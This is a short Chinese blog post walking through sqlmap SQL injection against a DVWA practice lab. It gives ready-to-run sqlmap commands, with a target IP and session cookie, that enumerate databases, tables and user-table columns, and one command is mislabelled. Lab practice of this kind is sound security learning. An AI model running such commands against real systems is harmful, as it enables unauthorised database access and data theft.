使用sqlmap测试dvwa的sql注入漏洞

发表于 2020-04-12 更新于 2021-11-12 分类于 IT 阅读次数：
本文字数： 752 阅读时长 ≈ 1 分钟

学习DVWA的SQL注入漏洞

前言

使用dvwa环境练习一下sql注入。

参考教程
输入测试数据，获取到http请求的url：http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

sqlmap时，需要带上cookie参数：

查看所有的数据库名称

1	python sqlmap.py -u "http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch --dbs

查看dvwa的所有表

1	python sqlmap.py -u "http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch -D dvwa -T users --columns

查看user表的列数据

1	python sqlmap.py -u "http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch -D dvwa -T users --columns